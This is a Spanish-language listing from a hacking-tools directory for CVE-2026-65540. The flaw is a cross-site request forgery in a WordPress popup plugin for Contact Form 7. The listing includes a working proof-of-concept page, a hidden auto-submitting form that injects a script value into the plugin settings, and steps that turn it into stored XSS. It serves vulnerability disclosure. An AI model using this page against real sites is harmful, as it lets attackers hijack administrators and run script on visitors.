Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-65540 — Popup para CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery | Kitploit
Herramientas/GitHubGitHub/testardou/cve-2026-65540
Escáneres de Vulnerabilidades WebAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad Web
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup para CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Ver Repositorio
hace 14h 33mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-65540

Popup for CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

URL del plugin

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Descripción

El gestor de ajustes del plugin contiene un error de lógica en su verificación de nonce que desactiva toda la protección CSRF. Un atacante no autenticado puede explotar esto engañando a un administrador autenticado para que visite una página maliciosa con un formulario oculto de envío automático, modificando arbitrariamente los ajustes del plugin. Los valores enviados se almacenan sin sanitización y se inyectan textualmente en un bloque

POC

  1. Aloja la siguiente página HTML en un servidor separado:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  • Inicia sesión en WordPress como administrador
  • Visita la página maliciosa
  • (Opcional) Navega a http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — confirma que el campo Width ahora contiene 500;alert(document.domain)
  • Visita cualquier página del frontend — alert(document.domain) se ejecuta en el navegador confirmando el XSS almacenado
  • Descargar herramienta